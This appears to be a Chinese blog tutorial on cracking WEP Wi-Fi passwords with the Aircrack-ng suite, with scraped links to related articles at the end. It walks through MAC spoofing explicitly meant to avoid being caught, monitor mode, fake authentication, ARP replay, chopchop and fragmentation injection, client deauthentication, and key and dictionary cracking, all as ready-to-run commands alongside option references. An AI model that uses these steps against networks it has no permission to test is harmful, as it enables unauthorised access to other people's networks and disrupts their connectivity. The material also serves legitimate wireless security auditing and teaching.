Linux:Aircrack-ng
Aircrack-ng
工具主要有
airmon-ng 处理网卡工作模式
airodump-ng 抓包
aircrack-ng 破解
aireplay-ng 发包,干扰
另外还要用到以下 linux 命令:
ifconfig 查看修改网卡状态和参数
macchanger 伪造 MAC
iwconfig 主要针对无线网卡的工具 (同 ifconfig)
iwlist 获取无线网络的更详细信息
具体破解步骤
1. 修改无线网卡状态: down
2. 伪造无线网卡的 MAC 地址:安全起见,减少被抓到的可能
3. 修改网卡工作模式:进入Monitor状态,会产生一个虚拟的网卡
4. 修改无线网卡状态: up
5. 查看网络状态,记录下 AP 的 MAC 和本机的 MAC ,确定攻击目标
6. 监听抓包:生成 .cap 或 .ivs
7. 干扰无线网络:截取无线数据包,发送垃圾数据包,用来获得更多的有效数据包
8. 破解 .cap 或 .ivs ,获得 WEP 密码,完成破解
Crack Mode一共有5种
airmon-ng start wlan0
airodump-ng --ivs -w (目标路由器IVS文件) -c 6 mon0
airodump-ng mon0
crack mode
1)
aireplay-ng -1 0 -e 目标路由器SSID -a 目标MAC -h 本机MAC mon0
2)
aireplay-ng -2 -p 0841 -c ffffffffffff -b 目标MAC -h 本机MAC mon0
3)
aireplay-ng -3 -b 目标MAC -h 本机MAC mon0
4)
aireplay-ng -4 -b 目标MAC -h 本机MAC mon0
packetforge-ng -0 -a 目标MAC -h 本机MAC -k 255.255.255.255 -l 255.255.255.255 -y .xor -w MyArp
aireplay-ng -2 -r MyArp -x 256 mon0
5)
aireplay-ng -5 -b 目标MAC -h 本机MACmon0
packetforge-ng -0 -a 目标MAC -h 本机MAC -k 255.255.255.255 -l 255.255.255.255 -y .xor -w MyArp
aireplay-ng -2 -r MyArp -x 256 mon0
Crack Key
aircrack-ng -n 64 -b 目标MAC 目标路由器IVS文件-01.ivs
命令的基本用法
ifconfig
用来配置网卡,我们这里主要用来 禁用和启用 网卡:
ifconfig mon0 down
ifconfig mon0 up
禁用一下网卡的目的是为了下一步修改 MAC 。
macchanger
用来改变网卡的 MAC 地址,具体用法如下:
useage: macchanger [options] device
-h 显示帮助
-V 显示版本
-s 显示当前MAC
-e 不改变mac,使用硬件厂商写入的MAC
-a 自动生成一个同类型的MAC,同厂商的
-A 自动生成一个不同类型的MAC,不同厂商的
-r 生成任意MAC
-l 显示已知厂商的网卡MAC地址分配,这个很有用,可以根据MAC查出来是哪个厂商生产的产品
-m 设置一个自定义的MAC 如: macchanger --mac=00:34:00:00:00:00 mon0 。
airmon-ng
启动无线网卡进入 Monitor 模式,
useage: airmon-ng <start|stop|check> <interface> [channel]
<start|stop|check>启动,停止,检测
<interface>指定无线网卡
[channel] 监听频道
iwconfig
专用的无线网卡配置工具,用来配置特殊的网络信息,不带参数时显示可用网络。
useage:iwconfig interface [options]
[essid{NN|ON|OFF}] 指定essid号 开启关闭
[nwid{NN|on|off}] 指定网络id号 开启关闭
[mode {managed|ad-hoc|....}] 指定无线网络工作模式/类型
[freq N.NNNN[K|M|G]] 指定工作频率
[channel N] 指定频道
[ap {N|off|auto}] 指定AP号 关闭/自动
[sens N] sens 号
[nick N] nick 号
[rate {N|auto|fixed}] 速率控制
[rts {N|auto|fixed|off}] rts控制,如果不知道什么是RTS,那就回去好好去学网络,不用往下看了
[frag {N|auto|fixed|off}] 碎片控制
[enc {NNNN-NNNN|off}] 范围
[power {period N|timeout N}] 电源 频率/超时
[retry {limit N|lifetime N}] 重试 限次/超时
[txpower N{mw|dBm}] 功率 毫瓦/分贝
[commit] 处理
iwlist
主要用来显示无线网卡的一些附加信息,同上
useage: iwlist [interface] options
scanning 扫描
frequency 频率
channel 频道
bitrate 速率
rate 速率
encryption 加密
key 密钥
power 电源
txpower 功率
ap ap
accespoints ap
peers 直连
event 事件
airodump-ng
useage: airodump-ng <options> <interface>[,<interface>,...]
Options:
--ivs :仅将抓取信息保存为 .ivs
--gpsd :使用 GPSd
--write <prefix> :保存为指定日文件名,我一般用这个,尤其是多个网络时,指定了也好区分
-w :同 --write
--beacons :保存所有的 beacons ,默认情况况下是丢弃那些无用的数据包的
--update <secs> :显示更新延迟
--showack :显示ack/cts/rts状态
-h :隐藏已知的,配合上面的选项使用
-f <msecs> :跳频时间
--berlin <secs> :无数据包接收时延迟显示的时间,意思是当那个信号发出设备没有发出数据包多少时间之后,就停止对它的监视.默认120秒.
-r <file> :从指定的文件读取数据包.
Filter options:
--encrypt <suite> : 使用密码序列过滤 AP
--netmask <netmask> : 使用掩码过滤 AP
--bssid <bssid> : 使用 bssid 过滤 AP
-a : 过滤无关的客户端.
默认情况下使用2.4Ghz,你也可以指定其他的频率,通过以下命令操作:
--channel <channels>:指定频道
--band <abg> :制定带宽
-C <frequencies> :指定频率MHz
--cswitch <method> : 设置频道交换方式
0 : FIFO (default) 先进先出(默认)
1 : Round Robin 循环
2 : Hop on last 最后一跳
-s : 同上
--help : 显示使用方法
aireplay-ng
useage: aireplay-ng <options> <replay interface>
Filter options:
-b bssid : AP的 MAC
-d dmac : 目标的 MAC
-s smac : 来源的 MAC
-m len : 最小包长度
-n len : 最大包长度
-u type : 帧控制, type field
-v subt : 帧控制, subtype field
-t tods : 帧控制, To DS bit
-f fromds : 帧控制, From DS bit
-w iswep : 帧控制, WEP bit
-D : 禁用 AP 发现功能
Replay options:
-x nbpps : 每秒包数量
-p fctrl : 框架设定 (hex)
-a bssid : 设置AP的 mac
-c dmac : 设置目标的 MAC
-h smac : 设置来源的 mac
-g value : 改变环缓存大小 (默认8)
-F : 选择第一个匹配的包
Fakeauth attack options:
-e essid : 设置目标 AP 的 SSID
-o npckts : 每秒爆破的包数量 (0 自动, 默认 1)
-q sec : 存活时间 秒
-y prga : 共享可信的 key流
Replay attack options:
-j : 注入 fromDS 数据包
Fragmentation attack options:
-k IP : 设置目的IP 碎片
-l IP : 设置源IP碎片
Test attack options:
-B : 激活 bitrate 测试
source options:
-i iface : 设置抓包的接口设备
-r file : 从pcap文件析取数据包
attack modes (Numbers can still be used): 攻击模式,最具杀伤力的地方
--deauth count : 不信任一切 (-0)
--fakeauth delay : 欺骗AP的信任 (-1)
--interactive : 交互的选择 (-2)
--arpreplay : 标准的 ARP欺骗原理-request replay (-3)
--chopchop : 解密 WEP 包 (-4)
--fragment : 生成有效的 key流 (-5)
--caffe-latte : 从客户端获取新的 IVs (-6)
--cfrag : 对客户端进行碎片攻击 (-7)
--test : 测试注射及效果 (-9)
--help : 显示帮助
aircrack-ng
useage: aircrack-ng [options] <.cap / .ivs file(s)>
Common options:
-a <amode> : 暴破 (1/WEP, 2/WPA-PSK)
-e <essid> : 选择 essid 为目标
-b <bssid> : 选择 ap的 mac 为目标
-q : 使用安静模式,无数出模式
-C <macs> : 将所有的 AP 合并为一个虚拟的
Static WEP cracking options:
-c : 仅搜索字母数字
-t : 仅搜索二进制
-h : 搜索数字关键
-d <mask> : 指定掩码(A1:XX:CF:YY)
-m <maddr> : 用 MAC 匹配可用的数据包
-n <nbits> : WEP 长度 64/128/152/256/512
-i <index> : WEP 索引(1 to 4), default: any
-f <fudge> : 暴破强度默认2
-k <korek> : 禁用一种破解方式 (1 to 17)
-x or -x0 : 禁用最新关键字暴破
-x1 : 使用最新关键字暴破 默认
-x2 : 用最新两个字节暴破
-y : 实验单线程模式
-K : KoreK 攻击 (pre-PTW)
-s : 显示为 ASCII
-M <num> : 最大数量 ivs 使用
-D : WEP 非隐蔽模式
-P <num> : PTW debug: 1 disable Klein, 2 PTW
-1 : 尝试一次 PTW
WEP and WPA-PSK cracking options:
-w <words> : 指定目录文件,可以多个
-r <DB> : 制定 airolib-ng 数据库,不能和 -w 一起使用
--help : 帮助
实例
ifconfig mon0 down
macchanger -r mon0
macchanger -r wlan0
ifconfig mon0 up
airmon-ng start mon0
iwconfig mon0
iwlist mon0 scanning
airodump-ng -w *.cap -c 6 mon0
aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX mon0 aireplay-ng -5 -b ap_mac -h XXXXXXXXXX mon0
aireplay-ng -3 -b ap_mac -h XXXXXXXXXX -x 1024 mon0
aireplay-ng -0 1 -a 00:00:00:00:00:00 -c BB:BB:BB:BB:BB:BB mon0
aireplay-ng -3 -b <AP MAC> -h <my MAC> -i mon0
aircrack-ng -x -f 2 *.cap
aircrack-ng -w passdict.txt *.cap
aircrack-ng -n 64 -b apmac *.ivs
Linux:Aircrack-ng的更多相关文章
- 2017年最适用于WIFI HACK的无线网卡推荐
http://www.freebuf.com/articles/wireless/140065.html 相信很多初次使用Kali Linux来进行无线渗透的小伙伴都曾遇到过一个非常头疼的问题,就是不 ...
- 适用于WIFI Hacking的无线网卡推荐
相信很多初次使用Kali Linux来进行无线渗透的小伙伴都曾遇到过一个非常头疼的问题,就是不知道如何选购一款合适的无线网卡.因为Kali Linux并不是所有的网卡都支持,一旦选错了网卡不仅会给我们 ...
- 配置kali linux
在7月底的时候,安全加介绍Fireeye出品的 免费恶意软件分析工具FlareVM,还可进行逆向工程和渗透测试 .今天是看到绿盟科技的一篇介绍Kali Linux配置的文章,这个工具也进入了 渗透测试 ...
- Kali Linux——迈向网络攻防
自从进入大三的课程后,在已学的高数.线代.数论.概率论.信息论.通信等知识的技术上,开始了网络信息安全.网 络攻防的学习.俗话说得好,磨刀不误砍柴工,开始网络攻防之旅也势必要一个好的工具.然 ...
- linux下用crunch工具生成密码
crunch是一款linux下的压缩后仅仅38k的小程序,crunch程序在2004年及以前由email为的作者编写mimayin@aciiid.ath.cx,后续版本由bofh28@gmail.co ...
- Linux 驱动开发
linux驱动开发总结(一) 基础性总结 1, linux驱动一般分为3大类: * 字符设备 * 块设备 * 网络设备 2, 开发环境构建: * 交叉工具链构建 * NFS和tftp服务器安装 3, ...
- Android手机流量分析工具介绍
一.20 Best Android Hacking Apps And Tools Of 2018 首先罗列常见的Android手机hacking的工具 #1The Android Network Ha ...
- crunch字典生成
密码破解基本有三种方法:第一种是人工猜解(垃圾桶工程和被动信息收集): 第二种是基于字典暴力破解(主流) 在kali里,是默认自带了字典的,分别放在下面三个文件中:/usr/share/wordlis ...
- Kali Linux使用Aircrack破解wifi密码(wpa/wpa2)
Kali Linux能做很多事,但是它主要以渗透测试及'破解wifi密码'闻名. 如果你使用Macbook 请看 使用macbook破解WPA/WPA2 wifi密码 要求: 安装有Kali Linu ...
- kali linux wifi破解(aircrack)
需要一个能监听的网卡 airmon-ng start wlan0(監聽網卡) airmon-ng check kill(清除其他有影响的環境) airodump-ng mon0 (掃描附近wifi) ...
随机推荐
- [简明版] 有道云笔记Markdown指南
使用有道词典配合Markdown,可以快速准确做出美观精致的笔记,下面我们来看一下如何使用有道词典的MarkDown功能. 什么是Markdown?Markdown是一种轻量级的「标记语言」,通常为程 ...
- 20145322第九周JAVA程序设计基础学习总结
20145322第九周JAVA程序设计基础学习总结 JDBC简介 JDBC全名Java DataBase Connectivity,是java联机数据库的标准规范.它定义一组标准类与接口,应用程序需要 ...
- JAVA 单向链表
package com.session.link; /** * 单向链表 */public class LinkedList<T> { private Node head;//指向链表头节 ...
- Object.defineProperties——MEAN开发后台的Model层
Object.defineProperties是什么?有什么用? 这个问题比较听起来可能比较难以理解,确实我也是在项目中遇到的才会去想.以前看到<高级程序设计>的时候,有这么一种东西,定义 ...
- ThinkPHP的URL重写时遇到No input file specified的解决方法
因为在Fastcgi模式下,php不支持rewrite的目标网址的PATH_INFO的解析 ThinkPHP运行在URL_MODEL=2时,会出现 No input file specified.的情 ...
- 综合一句话Shell破解
之前我在论坛发过了一句话的破解工具. 所以决定还是在基础上在改改,符合某些人的利用. 上一版只支持HTTPS/ASPX,这次改进后,也算是最后一版. 支持:PHP/HTTP/HTTPSASPX/HTT ...
- poj 2255 Tree Recovery 分治
Tree Recovery Description Little Valentine liked playing with binary trees very much. Her favorite g ...
- Mac 升级node与npm
第一步,先查看本机node.js版本: node -v 第二步,清除node.js的cache: sudo npm cache clean -f 第三步,安装 n 工具,这个工具是专门用来管理node ...
- bootstrap自定义——栅格列数修改
从下载的bootstrap文件中找到less文件夹里面的variables.less,然后可以找到栅格列数进行修改 然后执行一下bootstrap.less,通过命令行,切换到其所在的目录D:\03 ...
- mac下cordova的ios-deploy安装问题
mac下进行cordova项目编译部署到ios设备,这个时候需要安装ios-deploy,会失败: npm WARN lifecycle ios-deploy@1.8.6~preinstall: ca ...